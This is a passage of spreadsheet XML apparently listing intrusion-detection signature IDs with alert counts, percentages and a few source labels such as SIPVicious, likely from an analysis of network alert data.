26317, 29509, 47082, 2001353, 2001264, 24889, 2012063, 20566, 2021195, 22097, 2024930</t>
  </si>
  <si>
    <t>2025992 (167303), 2025649 (167303), 2924 (13554), 42944 (6657), 2025650 (2020), 2102924 (1739), 1394 (957), 41978 (328), 2015856 (302), 31136 (34), 2024297 (27), 28555 (10), 2050 (10), 2018585 (7), 42255 (6), 1735 (3), 2012252 (2), 2024217 (2), 1546 (2), 2009099 (2), 34799 (2), 2029575 (2), 2012647 (1), 2021195 (1)</t>
  </si>
  <si>
    <t>2025992, 2025649, 2924, 42944, 2025650, 2102924, 1394, 41978, 2015856, 31136, 2024297, 28555, 2050, 2018585, 42255, 1735, 2012252, 2024217, 1546, 2009099, 34799, 2029575, 2012647, 2021195</t>
  </si>
  <si>
    <t>12 (1307665), 15 (724578), 20 (676014), 14 (113525), 19 (13594), 5 (7706), 1 (5984), 28 (1705), 2 (290), 18 (121), 26 (118), 7 (110)</t>
  </si>
  <si>
    <t>12, 15, 20, 14, 19, 5, 1, 28, 2, 18, 26, 7</t>
  </si>
  <si>
    <t>12 (1307665), 15 (724578), 20 (676014), 14 (113525), 2011716 (13756), 19 (13594), 2008578 (12944), 5 (7706), 1 (5984), 2010937 (5587), 2010935 (3620), 2101411 (2430), 2001219 (1963), 2019401 (1732), 28 (1705), 2010939 (971), 2101280 (552), 2053892 (446), 2027757 (408), 2010936 (394), 2101616 (369), 2101413 (302), 2 (290), 2053893 (278), 2027413 (268), 2002911 (133), 18 (121), 2023640 (120), 26 (118), 7 (110), 2012296 (109), 2019102 (108), 2025822 (65), 2003068 (63), 2023753 (39), 2010938 (36), 2027412 (24), 2102003 (10), 2100579 (8), 2025712 (4), 2016778 (3), 2016683 (2), 2029340 (1), 2014380 (1)</t>
  </si>
  <si>
    <t>12, 15, 20, 14, 2011716, 19, 2008578, 5, 1, 2010937, 2010935, 2101411, 2001219, 2019401, 28, 2010939, 2101280, 2053892, 2027757, 2010936, 2101616, 2101413, 2, 2053893, 2027413, 2002911, 18, 2023640, 26, 7, 2012296, 2019102, 2025822, 2003068, 2023753, 2010938, 2027412, 2102003, 2100579, 2025712, 2016778, 2016683, 2029340, 2014380</t>
  </si>
  <si>
    <t>254 (2422493), 12 (869488), 15 (449255), 20 (403609), 20212 (393629), 51127 (298171), 42340 (220914), 14 (78298), 29456 (58417), 31767 (54574), 43496 (51446), 28993 (16284), 19 (8770), 5 (6844), 1 (6588), 20528 (2777), 27938 (2679), 4 (2674), 35527 (1781), 1417 (1404), 1411 (1225), 28 (1154), 385 (820), 42017 (816), 28556 (495), 46373 (461), 1280 (454), 25664 (415), 1201 (355), 1616 (196), 43808 (182), 2 (180), 1413 (179), 45578 (159), 36650 (136), 1010 (135), 48326 (113), 7 (84), 895 (78), 18 (74), 17152 (63), 41742 (50), 882 (50), 45941 (45), 42016 (36), 2339 (28), 1418 (28), 1420 (26), 48134 (26), 39320 (25), 51000 (22), 26 (18), 38381 (18), 35193 (14), 51333 (13), 30342 (13), 48331 (11), 15873 (10), 579 (8), 27899 (7), 21214 (7), 31341 (7), 2418 (7), 2003 (6), 2004 (6), 65062 (5), 1421 (4), 26989 (4), 650 (3), 853 (2), 649 (2), 1136 (2), 11263 (1), 23362 (1), 51344 (1), 31212 (1)</t>
  </si>
  <si>
    <t>254, 12, 15, 20, 20212, 51127, 42340, 14, 29456, 31767, 43496, 28993, 19, 5, 1, 20528, 27938, 4, 35527, 1417, 1411, 28, 385, 42017, 28556, 46373, 1280, 25664, 1201, 1616, 43808, 2, 1413, 45578, 36650, 1010, 48326, 7, 895, 18, 17152, 41742, 882, 45941, 42016, 2339, 1418, 1420, 48134, 39320, 51000, 26, 38381, 35193, 51333, 30342, 48331, 15873, 579, 27899, 21214, 31341, 2418, 2003, 2004, 65062, 1421, 26989, 650, 853, 649, 1136, 11263, 23362, 51344, 31212</t>
  </si>
  <si>
    <t>2002749 (1691786), 2100254 (1051502), 2009768 (518219), 2002752 (91587), 2009767 (51752), 2027759 (35791), 2014384 (12916), 2011716 (11588), 2008578 (10888), 2010937 (4603), 2027865 (3907), 2010935 (2904), 2003099 (2704), 2101417 (2069), 2101411 (1986), 2001219 (1647), 2003020 (1638), 2019401 (1598), 2009582 (1559), 2011411 (1456), 2100385 (1150), 2100469 (970), 2100615 (855), 2010939 (721), 2403542 (553), 2101280 (520), 2403538 (427), 2403550 (426), 2053892 (396), 2101620 (370), 2027757 (343), 2003012 (311), 2101616 (294), 2010936 (282), 2403678 (272), 2000545 (268), 2000537 (268), 2403543 (263), 2100527 (260), 2053893 (251), 2403551 (240), 2400014 (223), 2027413 (213), 2100628 (166), 2403578 (161), 2003006 (159), 2403560 (148), 2403539 (139), 2527036 (123), 2403540 (118), 2012296 (109), 2019102 (101), 2023640 (94), 2009584 (93), 2403839 (84), 2009583 (84), 2101413 (83), 2403561 (81), 2403579 (65), 2003068 (59), 2403541 (54), 2102336 (52), 2025822 (52), 2101418 (47), 2000538 (46), 2403838 (41), 2403501 (39), 2101420 (38), 2002826 (35), 2527030 (27), 2023753 (25), 2010938 (22), 2011408 (21), 2400021 (19), 2027412 (15), 2400032 (14), 2522312 (14), 2011368 (13), 2403622 (13), 2102003 (9), 2400005 (8), 2100579 (8), 2400033 (8), 2522304 (7), 2400060 (4), 2100472 (4), 2100650 (4), 2403826 (4), 2403888 (4), 2025712 (3), 2400011 (3), 2016778 (3), 2100649 (3), 2403830 (3), 2008470 (2), 2403878 (2), 2403624 (2), 2400017 (2), 2400061 (2), 2403416 (2), 2403618 (2), 2016683 (2), 2029340 (1), 2100613 (1), 2101852 (1), 2400013 (1), 2403677 (1), 2403506 (1), 2403652 (1), 2009886 (1), 2527028 (1), 2403596 (1), 2400010 (1), 2014380 (1), 2020632 (1), 2403882 (1), 2403616 (1), 2403656 (1)</t>
  </si>
  <si>
    <t>2002749, 2100254, 2009768, 2002752, 2009767, 2027759, 2014384, 2011716, 2008578, 2010937, 2027865, 2010935, 2003099, 2101417, 2101411, 2001219, 2003020, 2019401, 2009582, 2011411, 2100385, 2100469, 2100615, 2010939, 2403542, 2101280, 2403538, 2403550, 2053892, 2101620, 2027757, 2003012, 2101616, 2010936, 2403678, 2000545, 2000537, 2403543, 2100527, 2053893, 2403551, 2400014, 2027413, 2100628, 2403578, 2003006, 2403560, 2403539, 2527036, 2403540, 2012296, 2019102, 2023640, 2009584, 2403839, 2009583, 2101413, 2403561, 2403579, 2003068, 2403541, 2102336, 2025822, 2101418, 2000538, 2403838, 2403501, 2101420, 2002826, 2527030, 2023753, 2010938, 2011408, 2400021, 2027412, 2400032, 2522312, 2011368, 2403622, 2102003, 2400005, 2100579, 2400033, 2522304, 2400060, 2100472, 2100650, 2403826, 2403888, 2025712, 2400011, 2016778, 2100649, 2403830, 2008470, 2403878, 2403624, 2400017, 2400061, 2403416, 2403618, 2016683, 2029340, 2100613, 2101852, 2400013, 2403677, 2403506, 2403652, 2009886, 2527028, 2403596, 2400010, 2014380, 2020632, 2403882, 2403616, 2403656</t>
  </si>
  <si>
    <t>254 (2422493), 2002749 (1691786), 2100254 (1051502), 12 (869488), 2009768 (518219), 15 (449255), 20 (403609), 20212 (393629), 51127 (298171), 42340 (220914), 2002752 (91587), 14 (78298), 29456 (58417), 31767 (54574), 2009767 (51752), 43496 (51446), 2027759 (35791), 28993 (16284), 2014384 (12916), 2011716 (11588), 2008578 (10888), 19 (8770), 5 (6844), 1 (6588), 2010937 (4603), 2027865 (3907), 2010935 (2904), 20528 (2777), 2003099 (2704), 27938 (2679), 4 (2674), 2101417 (2069), 2101411 (1986), 35527 (1781), 2001219 (1647), 2003020 (1638), 2019401 (1598), 2009582 (1559), 2011411 (1456), 1417 (1404), 1411 (1225), 28 (1154), 2100385 (1150), 2100469 (970), 2100615 (855), 385 (820), 42017 (816), 2010939 (721), 2403542 (553), 2101280 (520), 28556 (495), 46373 (461), 1280 (454), 2403538 (427), 2403550 (426), 25664 (415), 2053892 (396), 2101620 (370), 1201 (355), 2027757 (343), 2003012 (311), 2101616 (294), 2010936 (282), 2403678 (272), 2000545 (268), 2000537 (268), 2403543 (263), 2100527 (260), 2053893 (251), 2403551 (240), 2400014 (223), 2027413 (213), 1616 (196), 43808 (182), 2 (180), 1413 (179), 2100628 (166), 2403578 (161), 45578 (159), 2003006 (159), 2403560 (148), 2403539 (139), 36650 (136), 1010 (135), 2527036 (123), 2403540 (118), 48326 (113), 2012296 (109), 2019102 (101), 2023640 (94), 2009584 (93), 2403839 (84), 2009583 (84), 7 (84), 2101413 (83), 2403561 (81), 895 (78), 18 (74), 2403579 (65), 17152 (63), 2003068 (59), 2403541 (54), 2102336 (52), 2025822 (52), 41742 (50), 882 (50), 2101418 (47), 2000538 (46), 45941 (45), 2403838 (41), 2403501 (39), 2101420 (38), 42016 (36), 2002826 (35), 2339 (28), 1418 (28), 2527030 (27), 1420 (26), 48134 (26), 39320 (25), 2023753 (25), 2010938 (22), 51000 (22), 2011408 (21), 2400021 (19), 26 (18), 38381 (18), 2027412 (15), 2400032 (14), 2522312 (14), 35193 (14), 51333 (13), 2011368 (13), 30342 (13), 2403622 (13), 48331 (11), 15873 (10), 2102003 (9), 2400005 (8), 579 (8), 2100579 (8), 2400033 (8), 27899 (7), 21214 (7), 31341 (7), 2418 (7), 2522304 (7), 2003 (6), 2004 (6), 65062 (5), 2400060 (4), 2100472 (4), 1421 (4), 2100650 (4), 2403826 (4), 2403888 (4), 26989 (4), 2025712 (3), 650 (3), 2400011 (3), 2016778 (3), 2100649 (3), 2403830 (3), 853 (2), 2008470 (2), 2403878 (2), 2403624 (2), 2400017 (2), 649 (2), 2400061 (2), 2403416 (2), 1136 (2), 2403618 (2), 2016683 (2), 11263 (1), 2029340 (1), 2100613 (1), 2101852 (1), 23362 (1), 2400013 (1), 2403677 (1), 2403506 (1), 2403652 (1), 51344 (1), 2009886 (1), 31212 (1), 2527028 (1), 2403596 (1), 2400010 (1), 2014380 (1), 2020632 (1), 2403882 (1), 2403616 (1), 2403656 (1)</t>
  </si>
  <si>
    <t>254, 2002749, 2100254, 12, 2009768, 15, 20, 20212, 51127, 42340, 2002752, 14, 29456, 31767, 2009767, 43496, 2027759, 28993, 2014384, 2011716, 2008578, 19, 5, 1, 2010937, 2027865, 2010935, 20528, 2003099, 27938, 4, 2101417, 2101411, 35527, 2001219, 2003020, 2019401, 2009582, 2011411, 1417, 1411, 28, 2100385, 2100469, 2100615, 385, 42017, 2010939, 2403542, 2101280, 28556, 46373, 1280, 2403538, 2403550, 25664, 2053892, 2101620, 1201, 2027757, 2003012, 2101616, 2010936, 2403678, 2000545, 2000537, 2403543, 2100527, 2053893, 2403551, 2400014, 2027413, 1616, 43808, 2, 1413, 2100628, 2403578, 45578, 2003006, 2403560, 2403539, 36650, 1010, 2527036, 2403540, 48326, 2012296, 2019102, 2023640, 2009584, 2403839, 2009583, 7, 2101413, 2403561, 895, 18, 2403579, 17152, 2003068, 2403541, 2102336, 2025822, 41742, 882, 2101418, 2000538, 45941, 2403838, 2403501, 2101420, 42016, 2002826, 2339, 1418, 2527030, 1420, 48134, 39320, 2023753, 2010938, 51000, 2011408, 2400021, 26, 38381, 2027412, 2400032, 2522312, 35193, 51333, 2011368, 30342, 2403622, 48331, 15873, 2102003, 2400005, 579, 2100579, 2400033, 27899, 21214, 31341, 2418, 2522304, 2003, 2004, 65062, 2400060, 2100472, 1421, 2100650, 2403826, 2403888, 26989, 2025712, 650, 2400011, 2016778, 2100649, 2403830, 853, 2008470, 2403878, 2403624, 2400017, 649, 2400061, 2403416, 1136, 2403618, 2016683, 11263, 2029340, 2100613, 2101852, 23362, 2400013, 2403677, 2403506, 2403652, 51344, 2009886, 31212, 2527028, 2403596, 2400010, 2014380, 2020632, 2403882, 2403616, 2403656</t>
  </si>
  <si>
    <t>254 (4195140), 42340 (365159), 29456 (101390), 1417 (2550), 1411 (2248), 385 (1387), 28556 (857), 1280 (546), 1201 (513), 1616 (358), 1413 (302), 1010 (239), 895 (90), 2339 (61), 1418 (58), 882 (57), 1420 (46), 2003 (10), 2004 (10), 2418 (9), 579 (8), 27899 (7), 853 (5), 1421 (5), 650 (4), 649 (3), 1852 (2), 1136 (2), 613 (1)</t>
  </si>
  <si>
    <t>254 (4195140), 12 (1307665), 15 (724578), 20 (676014), 42340 (365159), 14 (113525), 29456 (101390), 2011716 (13756), 19 (13594), 2008578 (12944), 5 (7706), 1 (5984), 2010937 (5587), 2010935 (3620), 1417 (2550), 2101411 (2430), 1411 (2248), 2001219 (1963), 2019401 (1732), 28 (1705), 385 (1387), 2010939 (971), 28556 (857), 2101280 (552), 1280 (546), 1201 (513), 2053892 (446), 2027757 (408), 2010936 (394), 2101616 (369), 1616 (358), 2101413 (302), 1413 (302), 2 (290), 2053893 (278), 2027413 (268), 1010 (239), 2002911 (133), 18 (121), 2023640 (120), 26 (118), 7 (110), 2012296 (109), 2019102 (108), 895 (90), 2025822 (65), 2003068 (63), 2339 (61), 1418 (58), 882 (57), 1420 (46), 2023753 (39), 2010938 (36), 2027412 (24), 2102003 (10), 2003 (10), 2004 (10), 2418 (9), 2100579 (8), 579 (8), 27899 (7), 853 (5), 1421 (5), 2025712 (4), 650 (4), 649 (3), 2016778 (3), 1852 (2), 1136 (2), 2016683 (2), 2029340 (1), 613 (1), 2014380 (1)</t>
  </si>
  <si>
    <t>254, 12, 15, 20, 42340, 14, 29456, 2011716, 19, 2008578, 5, 1, 2010937, 2010935, 1417, 2101411, 1411, 2001219, 2019401, 28, 385, 2010939, 28556, 2101280, 1280, 1201, 2053892, 2027757, 2010936, 2101616, 1616, 2101413, 1413, 2, 2053893, 2027413, 1010, 2002911, 18, 2023640, 26, 7, 2012296, 2019102, 895, 2025822, 2003068, 2339, 1418, 882, 1420, 2023753, 2010938, 2027412, 2102003, 2003, 2004, 2418, 2100579, 579, 27899, 853, 1421, 2025712, 650, 649, 2016778, 1852, 1136, 2016683, 2029340, 613, 2014380</t>
  </si>
  <si>
    <t>3 (2448485), 33 (2307494), 18 (2161836), 8 (907), 22 (628), 6 (153), 2 (139), 7 (28), 31 (1), 4 (1)</t>
  </si>
  <si>
    <t>3, 33, 18, 8, 22, 6, 2, 7, 31, 4</t>
  </si>
  <si>
    <t>2001330 (4156710), 2102466 (392240), 2102465 (377800), 2100366 (55345), 2001972 (51333), 2100372 (45362), 2012709 (17699), 2100368 (10825), 2016149 (3212), 2012711 (1352), 2018124 (991), 2027390 (591), 2012710 (284), 2013479 (201), 2012712 (152), 2100566 (133), 2100373 (117), 2100369 (117), 2025275 (41), 2038967 (29), 2036252 (5), 2050281 (5), 2033078 (4), 2100537 (2), 2100538 (1), 2015023 (1)</t>
  </si>
  <si>
    <t>2001330 (4156710), 3 (2448485), 33 (2307494), 18 (2161836), 2102466 (392240), 2102465 (377800), 2100366 (55345), 2001972 (51333), 2100372 (45362), 2012709 (17699), 2100368 (10825), 2016149 (3212), 2012711 (1352), 2018124 (991), 8 (907), 22 (628), 2027390 (591), 2012710 (284), 2013479 (201), 6 (153), 2012712 (152), 2 (139), 2100566 (133), 2100373 (117), 2100369 (117), 2025275 (41), 2038967 (29), 7 (28), 2036252 (5), 2050281 (5), 2033078 (4), 2100537 (2), 31 (1), 2100538 (1), 2015023 (1), 4 (1)</t>
  </si>
  <si>
    <t>2001330, 3, 33, 18, 2102466, 2102465, 2100366, 2001972, 2100372, 2012709, 2100368, 2016149, 2012711, 2018124, 8, 22, 2027390, 2012710, 2013479, 6, 2012712, 2, 2100566, 2100373, 2100369, 2025275, 2038967, 7, 2036252, 2050281, 2033078, 2100537, 31, 2100538, 2015023, 4</t>
  </si>
  <si>
    <t>1448 (2158863), 3 (1540385), 33 (1446594), 18 (1411305), 21232 (511807), 5730 (122607), 384 (59118), 408 (59021), 366 (32973), 449 (26388), 372 (17353), 1917 (16887), 4060 (6701), 368 (6579), 44416 (1102), 399 (778), 8 (681), 39488 (664), 402 (593), 2049 (431), 22 (323), 11968 (254), 42946 (215), 401 (198), 382 (166), 37909 (165), 28557 (100), 2 (87), 24304 (83), 373 (79), 369 (79), 17110 (70), 453 (68), 451 (68), 566 (67), 6 (61), 381 (38), 404 (35), 16008 (16), 7 (15), 18474 (9), 41077 (8), 41063 (5), 41075 (3), 41061 (3), 28039 (3), 24303 (2), 1447 (2), 41068 (2), 396 (2), 31 (1), 41072 (1), 41066 (1), 41055 (1), 3822 (1), 4 (1), 41074 (1), 41065 (1), 41056 (1), 41057 (1), 41067 (1), 41071 (1), 41054 (1)</t>
  </si>
  <si>
    <t>1448, 3, 33, 18, 21232, 5730, 384, 408, 366, 449, 372, 1917, 4060, 368, 44416, 399, 8, 39488, 402, 2049, 22, 11968, 42946, 401, 382, 37909, 28557, 2, 24304, 373, 369, 17110, 453, 451, 566, 6, 381, 404, 16008, 7, 18474, 41077, 41063, 41075, 41061, 28039, 24303, 1447, 41068, 396, 31, 41072, 41066, 41055, 3822, 4, 41074, 41065, 41056, 41057, 41067, 41071, 41054</t>
  </si>
  <si>
    <t>2001330 (3096254), 2101447 (3026661), 2001329 (3026659), 2102466 (314814), 2102465 (301927), 2023997 (235449), 2100384 (76426), 2001117 (54310), 2102925 (50001), 2100366 (44001), 2001972 (38539), 2100372 (19365), 2100486 (18069), 2012709 (13749), 2100368 (8675), 2001331 (5203), 2101917 (4717), 2016149 (2789), 2044666 (2357), 2043304 (2305), 2012711 (960), 2100399 (894), 2018124 (851), 2100402 (795), 2100408 (746), 2031490 (590), 2102049 (492), 2000428 (380), 2030835 (376), 2031491 (367), 2027390 (345), 2100401 (201), 2013479 (194), 2012710 (143), 2031489 (136), 2100524 (127), 2100485 (101), 2100373 (99), 2100369 (99), 2100453 (91), 2100566 (85), 2012712 (77), 2001404 (60), 2100381 (54), 2100404 (47), 2044665 (41), 2013491 (34), 2001904 (23), 2067085 (18), 2067086 (18), 2067087 (18), 2038967 (17), 2025275 (15), 2100382 (14), 2013490 (10), 2036223 (5), 2036252 (5), 2050281 (5), 2100525 (4), 2100396 (3), 2033078 (3), 2010816 (2), 2100537 (2), 2059172 (2), 2036222 (1), 2062460 (1), 2100538 (1), 2015023 (1), 2062459 (1)</t>
  </si>
  <si>
    <t>2001330, 2101447, 2001329, 2102466, 2102465, 2023997, 2100384, 2001117, 2102925, 2100366, 2001972, 2100372, 2100486, 2012709, 2100368, 2001331, 2101917, 2016149, 2044666, 2043304, 2012711, 2100399, 2018124, 2100402, 2100408, 2031490, 2102049, 2000428, 2030835, 2031491, 2027390, 2100401, 2013479, 2012710, 2031489, 2100524, 2100485, 2100373, 2100369, 2100453, 2100566, 2012712, 2001404, 2100381, 2100404, 2044665, 2013491, 2001904, 2067085, 2067086, 2067087, 2038967, 2025275, 2100382, 2013490, 2036223, 2036252, 2050281, 2100525, 2100396, 2033078, 2010816, 2100537, 2059172, 2036222, 2062460, 2100538, 2015023, 2062459</t>
  </si>
  <si>
    <t>2001330 (3096254), 2101447 (3026661), 2001329 (3026659), 1448 (2158863), 3 (1540385), 33 (1446594), 18 (1411305), 21232 (511807), 2102466 (314814), 2102465 (301927), 2023997 (235449), 5730 (122607), 2100384 (76426), 384 (59118), 408 (59021), 2001117 (54310), 2102925 (50001), 2100366 (44001), 2001972 (38539), 366 (32973), 449 (26388), 2100372 (19365), 2100486 (18069), 372 (17353), 1917 (16887), 2012709 (13749), 2100368 (8675), 4060 (6701), 368 (6579), 2001331 (5203), 2101917 (4717), 2016149 (2789), 2044666 (2357), 2043304 (2305), 44416 (1102), 2012711 (960), 2100399 (894), 2018124 (851), 2100402 (795), 399 (778), 2100408 (746), 8 (681), 39488 (664), 402 (593), 2031490 (590), 2102049 (492), 2049 (431), 2000428 (380), 2030835 (376), 2031491 (367), 2027390 (345), 22 (323), 11968 (254), 42946 (215), 2100401 (201), 401 (198), 2013479 (194), 382 (166), 37909 (165), 2012710 (143), 2031489 (136), 2100524 (127), 2100485 (101), 28557 (100), 2100373 (99), 2100369 (99), 2100453 (91), 2 (87), 2100566 (85), 24304 (83), 373 (79), 369 (79), 2012712 (77), 17110 (70), 453 (68), 451 (68), 566 (67), 6 (61), 2001404 (60), 2100381 (54), 2100404 (47), 2044665 (41), 381 (38), 404 (35), 2013491 (34), 2001904 (23), 2067085 (18), 2067086 (18), 2067087 (18), 2038967 (17), 16008 (16), 2025275 (15), 7 (15), 2100382 (14), 2013490 (10), 18474 (9), 41077 (8), 2036223 (5), 41063 (5), 2036252 (5), 2050281 (5), 2100525 (4), 41075 (3), 41061 (3), 2100396 (3), 28039 (3), 2033078 (3), 2010816 (2), 24303 (2), 1447 (2), 2100537 (2), 2059172 (2), 41068 (2), 396 (2), 31 (1), 2036222 (1), 2062460 (1), 2100538 (1), 41072 (1), 41066 (1), 2015023 (1), 41055 (1), 3822 (1), 4 (1), 41074 (1), 41065 (1), 41056 (1), 41057 (1), 41067 (1), 41071 (1), 41054 (1), 2062459 (1)</t>
  </si>
  <si>
    <t>2001330, 2101447, 2001329, 1448, 3, 33, 18, 21232, 2102466, 2102465, 2023997, 5730, 2100384, 384, 408, 2001117, 2102925, 2100366, 2001972, 366, 449, 2100372, 2100486, 372, 1917, 2012709, 2100368, 4060, 368, 2001331, 2101917, 2016149, 2044666, 2043304, 44416, 2012711, 2100399, 2018124, 2100402, 399, 2100408, 8, 39488, 402, 2031490, 2102049, 2049, 2000428, 2030835, 2031491, 2027390, 22, 11968, 42946, 2100401, 401, 2013479, 382, 37909, 2012710, 2031489, 2100524, 2100485, 28557, 2100373, 2100369, 2100453, 2, 2100566, 24304, 373, 369, 2012712, 17110, 453, 451, 566, 6, 2001404, 2100381, 2100404, 2044665, 381, 404, 2013491, 2001904, 2067085, 2067086, 2067087, 2038967, 16008, 2025275, 7, 2100382, 2013490, 18474, 41077, 2036223, 41063, 2036252, 2050281, 2100525, 41075, 41061, 2100396, 28039, 2033078, 2010816, 24303, 1447, 2100537, 2059172, 41068, 396, 31, 2036222, 2062460, 2100538, 41072, 41066, 2015023, 41055, 3822, 4, 41074, 41065, 41056, 41057, 41067, 41071, 41054, 2062459</t>
  </si>
  <si>
    <t>1448 (3659753), 384 (102526), 408 (102433), 449 (53725), 366 (51561), 372 (34810), 1917 (26632), 368 (10184), 399 (951), 402 (914), 2049 (573), 11968 (254), 401 (217), 28557 (194), 382 (168), 566 (125), 373 (114), 369 (114), 453 (109), 451 (109), 381 (66), 404 (58), 1447 (8), 396 (5)</t>
  </si>
  <si>
    <t>2001330 (4156710), 1448 (3659753), 3 (2448485), 33 (2307494), 18 (2161836), 2102466 (392240), 2102465 (377800), 384 (102526), 408 (102433), 2100366 (55345), 449 (53725), 366 (51561), 2001972 (51333), 2100372 (45362), 372 (34810), 1917 (26632), 2012709 (17699), 2100368 (10825), 368 (10184), 2016149 (3212), 2012711 (1352), 2018124 (991), 399 (951), 402 (914), 8 (907), 22 (628), 2027390 (591), 2049 (573), 2012710 (284), 11968 (254), 401 (217), 2013479 (201), 28557 (194), 382 (168), 6 (153), 2012712 (152), 2 (139), 2100566 (133), 566 (125), 2100373 (117), 2100369 (117), 373 (114), 369 (114), 453 (109), 451 (109), 381 (66), 404 (58), 2025275 (41), 2038967 (29), 7 (28), 1447 (8), 2036252 (5), 396 (5), 2050281 (5), 2033078 (4), 2100537 (2), 31 (1), 2100538 (1), 2015023 (1), 4 (1)</t>
  </si>
  <si>
    <t>2001330, 1448, 3, 33, 18, 2102466, 2102465, 384, 408, 2100366, 449, 366, 2001972, 2100372, 372, 1917, 2012709, 2100368, 368, 2016149, 2012711, 2018124, 399, 402, 8, 22, 2027390, 2049, 2012710, 11968, 401, 2013479, 28557, 382, 6, 2012712, 2, 2100566, 566, 2100373, 2100369, 373, 369, 453, 451, 381, 404, 2025275, 2038967, 7, 1447, 2036252, 396, 2050281, 2033078, 2100537, 31, 2100538, 2015023, 4</t>
  </si>
  <si>
    <t>1, 3, 4, 5, 12, 14, 15, 18, 19, 20, 28, 33, 254, 366, 368, 384, 408, 449, 1411, 1417, 1448, 1917, 2924, 4060, 5730, 11192, 13974, 15306, 16418, 20212, 20528, 21232, 27938, 28069, 28993, 29456, 29957, 31767, 32481, 40186, 42340, 42944, 43496, 44416, 44484, 44485, 44486, 44487, 44488, 44489, 50447, 50633, 51127, 57756, 59258</t>
  </si>
  <si>
    <t>2001117, 2001219, 2001329, 2001330, 2001331, 2001972, 2002749, 2002752, 2002948, 2003020, 2003099, 2003595, 2008578, 2009582, 2009767, 2009768, 2010935, 2010937, 2010939, 2011411, 2011716, 2012709, 2012711, 2014384, 2018124, 2019401, 2021630, 2022218, 2023997, 2024766, 2025649, 2025650, 2025992, 2027759, 2027865, 2031490, 2034857, 2043304, 2044666, 2100254, 2100312, 2100366, 2100368, 2100384, 2100402, 2100469, 2100486, 2100615, 2101280, 2101411, 2101417, 2101447, 2101917, 2102465, 2102466, 2102924, 2102925, 2403542</t>
  </si>
  <si>
    <t>1, 3, 4, 5, 12, 14, 15, 18, 19, 20, 28, 33, 254, 366, 368, 384, 408, 449, 1411, 1417, 1448, 1917, 2924, 4060, 5730, 11192, 13974, 15306, 16418, 20212, 20528, 21232, 27938, 28069, 28993, 29456, 29957, 31767, 32481, 40186, 42340, 42944, 43496, 44416, 44484, 44485, 44486, 44487, 44488, 44489, 50447, 50633, 51127, 57756, 59258, 2001117, 2001219, 2001329, 2001330, 2001331, 2001972, 2002749, 2002752, 2002948, 2003020, 2003099, 2003595, 2008578, 2009582, 2009767, 2009768, 2010935, 2010937, 2010939, 2011411, 2011716, 2012709, 2012711, 2014384, 2018124, 2019401, 2021630, 2022218, 2023997, 2024766, 2025649, 2025650, 2025992, 2027759, 2027865, 2031490, 2034857, 2043304, 2044666, 2100254, 2100312, 2100366, 2100368, 2100384, 2100402, 2100469, 2100486, 2100615, 2101280, 2101411, 2101417, 2101447, 2101917, 2102465, 2102466, 2102924, 2102925, 2403542</t>
  </si>
  <si>
    <t>254, 366, 368, 384, 385, 402, 408, 449, 1201, 1280, 1411, 1417, 1448, 1917, 2049, 2924, 28556, 29456, 42340, 42944</t>
  </si>
  <si>
    <t>1, 3, 5, 12, 14, 15, 18, 19, 20, 28, 33, 254, 366, 368, 384, 385, 402, 408, 449, 1201, 1280, 1411, 1417, 1448, 1917, 2049, 2924, 28556, 29456, 42340, 42944, 2001219, 2001330, 2001972, 2008578, 2010935, 2010937, 2010939, 2011716, 2012709, 2012711, 2018124, 2019401, 2025649, 2025650, 2025992, 2100366, 2100368, 2101280, 2101411, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t>12090, 33106, 43796, 43799, 43963, 47173, 7929858</t>
  </si>
  <si>
    <t>65.45%</t>
  </si>
  <si>
    <t>84.55%</t>
  </si>
  <si>
    <t>55.45%</t>
  </si>
  <si>
    <t>63.64%</t>
  </si>
  <si>
    <t>1, 3, 4, 12, 14, 15, 18, 19, 20, 28, 33, 254, 366, 384, 408, 449, 1411, 1417, 1448, 1917, 2924, 4060, 5730, 20212, 20528, 21232, 27938, 28993, 29456, 29957, 31767, 32481, 40186, 42340, 42944, 43496, 44484, 44485, 44486, 44487, 44488, 44489, 50447, 50633, 51127, 57756</t>
  </si>
  <si>
    <t>2001117, 2001219, 2001329, 2001330, 2001331, 2001972, 2002749, 2002752, 2002948, 2003020, 2003099, 2003595, 2008578, 2009582, 2009767, 2009768, 2010935, 2010937, 2011716, 2012709, 2014384, 2019401, 2021630, 2022218, 2023997, 2024766, 2025649, 2025650, 2025992, 2027759, 2027865, 2034857, 2043304, 2044666, 2100254, 2100366, 2100384, 2100486, 2101411, 2101417, 2101447, 2101917, 2102465, 2102466, 2102924, 2102925</t>
  </si>
  <si>
    <t>1, 3, 4, 12, 14, 15, 18, 19, 20, 28, 33, 254, 366, 384, 408, 449, 1411, 1417, 1448, 1917, 2924, 4060, 5730, 20212, 20528, 21232, 27938, 28993, 29456, 29957, 31767, 32481, 40186, 42340, 42944, 43496, 44484, 44485, 44486, 44487, 44488, 44489, 50447, 50633, 51127, 57756, 2001117, 2001219, 2001329, 2001330, 2001331, 2001972, 2002749, 2002752, 2002948, 2003020, 2003099, 2003595, 2008578, 2009582, 2009767, 2009768, 2010935, 2010937, 2011716, 2012709, 2014384, 2019401, 2021630, 2022218, 2023997, 2024766, 2025649, 2025650, 2025992, 2027759, 2027865, 2034857, 2043304, 2044666, 2100254, 2100366, 2100384, 2100486, 2101411, 2101417, 2101447, 2101917, 2102465, 2102466, 2102924, 2102925</t>
  </si>
  <si>
    <t>254, 366, 384, 408, 449, 1411, 1417, 1448, 1917, 2924, 29456, 42340, 42944</t>
  </si>
  <si>
    <t>1, 3, 5, 12, 14, 15, 18, 19, 20, 28, 33, 254, 366, 384, 408, 449, 1411, 1417, 1448, 1917, 2924, 29456, 42340, 42944, 2001219, 2001330, 2001972, 2008578, 2010935, 2010937, 2011716, 2012709, 2012711, 2019401, 2025649, 2025650, 2025992, 2100366, 2101411, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t>ISF, Microsoft, SIPVicious</t>
  </si>
  <si>
    <t>74.55%</t>
  </si>
  <si>
    <t>88.18%</t>
  </si>
  <si>
    <t>2001219, 2001972, 2003068, 2008578, 2009099, 2011716, 2012252, 2012296, 2012647, 2012709, 2012710, 2012711, 2012712, 2013479, 2014380, 2015023, 2015856, 2016149, 2016683, 2016778, 2018124, 2018585, 2019102, 2019401, 2021195, 2023640, 2024217, 2025275, 2025712, 2025822, 2027390, 2027412, 2027757, 2029340, 2029575, 2033078, 2036252, 2038967, 2050281, 2053892, 2053893, 2100368, 2100369, 2100372, 2100373, 2100537, 2100538, 2100566, 2100579, 2101280, 2101413, 2101616, 2102003, 2102466, 2102924</t>
  </si>
  <si>
